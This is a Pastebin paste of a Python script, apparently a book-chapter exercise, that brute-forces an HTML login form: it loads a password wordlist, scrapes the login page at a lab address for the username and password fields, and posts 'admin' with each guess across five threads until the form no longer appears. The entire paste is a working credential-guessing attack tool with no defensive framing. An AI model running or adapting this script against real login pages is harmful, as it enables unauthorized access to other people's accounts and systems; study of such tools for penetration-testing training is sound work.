API tools faq
paste
Advertisement
Guest User

brute force form

a guest
Dec 9th, 2017
72
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.52 KB | None | 0 0
raw download clone embed print report
  1. #ch5_html_form_brute_force.py
  2. from html.parser import HTMLParser
  3. import urllib.request
  4. import urllib.parse
  5. import http.cookiejar
  6. import queue
  7. import threading
  8. import sys
  9. import os
  10.  
  11. threads = 5
  12. resume_word = None
  13. username = "admin"
  14. headers = {}
  15. target_url = "http://10.0.0.3:9001/login/"
  16. post_url = "http://10.0.0.3:9001/login/"
  17. username_field = "username"
  18. password_field = "password"
  19.  
  20. #Takes a word file and builds a word queue object. You can resume a word in the file
  21. #by modifying the resume_word value in the script
  22. def build_passwd_q(passwd_file):
  23. fd = open(passwd_file, "rb")
  24. passwd_list = fd.readlines()
  25. fd.close()
  26.  
  27. passwd_q = queue.Queue()
  28.  
  29. if len(passwd_list):
  30. if not resume_word:
  31. for passwd in passwd_list:
  32. passwd = passwd.decode("utf-8").rstrip()
  33. passwd_q.put(passwd)
  34. else:
  35. resume_found = False
  36. for passwd in passwd_list:
  37. passwd = passwd.decode("utf-8").rstrip()
  38. if passwd == resume_word:
  39. resume_found = True
  40. passwd_q.put(passwd)
  41. else:
  42. if resume_found:
  43. passwd_q.put(passwd)
  44. return passwd_q
  45.  
  46. #An instance of this class, would perform the following:
  47. #1- Pull out a password from the queue
  48. #2- Retrieve the login HTML page
  49. #3- Parse the resulting HTML looking for username and password fields
  50. #as part of the input form
  51. #4- Performs a POST on the login page with the username and the retrieved password
  52. #5- Retrieve the resulting HTML page. If the page does not have the login form,
  53. #we assume Brute-Force is successful. Otherwise, repeat the whole process with
  54. #the next password in the queue
  55. class BruteForcer():
  56. def __init__(self, username, passwd_q):
  57. self.username = username
  58. self.passwd_q = passwd_q
  59. self.found = False
  60.  
  61. def html_brute_forcer(self):
  62. while not passwd_q.empty() and not self.found:
  63. #Enable cookies for the session
  64. cookiejar = http.cookiejar.FileCookieJar("cookies")
  65. opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookiejar))
  66.  
  67. #This allows urlopen to use cookiejar
  68. urllib.request.install_opener(opener)
  69.  
  70. request = urllib.request.Request(target_url, headers=headers)
  71. response = urllib.request.urlopen(request)
  72.  
  73. #The response is in bytes. Convert to string and remove b''
  74. page = str(response.read())[2:-1]
  75.  
  76. #Parse HTML Form
  77. parsed_html = BruteParser()
  78. parsed_html.feed(page)
  79.  
  80. if username_field in parsed_html.parsed_results.keys() and password_field in parsed_html.parsed_results.keys():
  81. parsed_html.parsed_results[username_field] = self.username
  82. parsed_html.parsed_results[password_field] = self.passwd_q.get()
  83.  
  84. print(f"[*] Attempting {self.username}/{parsed_html.parsed_results[password_field]}")
  85.  
  86. #Must be bytes
  87. post_data = urllib.parse.urlencode(parsed_html.parsed_results).encode()
  88.  
  89. brute_force_request = urllib.request.Request(post_url, headers=headers)
  90. brute_force_response = urllib.request.urlopen(brute_force_request, data=post_data)
  91.  
  92. #The response is in bytes. Convert to string and remove b''
  93. brute_force_page = str(brute_force_response.read())[2:-1]
  94.  
  95. #Parse HTML Form
  96. brute_force_parsed_html = BruteParser()
  97. brute_force_parsed_html.feed(brute_force_page)
  98.  
  99. if not brute_force_parsed_html.parsed_results:
  100. self.found= True
  101. print("[*] Brute-Force Attempt is Successful!")
  102. print(f"[*] Username: {self.username}")
  103. print(f"[*] Password: {parsed_html.parsed_results[password_field]}")
  104. print("[*] Done")
  105. os._exit(0)
  106. else:
  107. print("[!] HTML Page is Invalid")
  108. break
  109.  
  110. #Brute-Forcing with multiple threads
  111. def html_brute_forcer_thread_starter(self):
  112. print(f"[*] Brute-Forcing with {threads} threads")
  113. for i in range(threads):
  114. html_brute_forcer_thread = threading.Thread(target=self.html_brute_forcer)
  115. html_brute_forcer_thread.start()
  116.  
  117. #An instance of this class allows for parsing the HTML page looking for username
  118. #and password fields as part of the input form. self.parsed_results should contain
  119. #username and password keys
  120. class BruteParser(HTMLParser):
  121. def __init__(self):
  122. HTMLParser.__init__(self)
  123. self.parsed_results = {}
  124.  
  125. def handle_starttag(self, tag, attrs):
  126. if tag == "input":
  127. for name, value in attrs:
  128. if name == "name" and value == username_field:
  129. self.parsed_results[username_field] = username_field
  130. if name == "name" and value == password_field:
  131. self.parsed_results[password_field] = password_field
  132.  
  133.  
  134. print("[*] Started HTML Form Brute-Forcer Script")
  135. print("[*] Building Password Queue")
  136. passwd_q = build_passwd_q("passwd.txt")
  137. if passwd_q.qsize():
  138. print("[*] Password Queue Build Successful")
  139. attempt_brute_force = BruteForcer("admin", passwd_q)
  140. attempt_brute_force.html_brute_forcer_thread_starter()
  141. else:
  142. print("[!] Empty Password File!")
  143. sys.exit(0)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!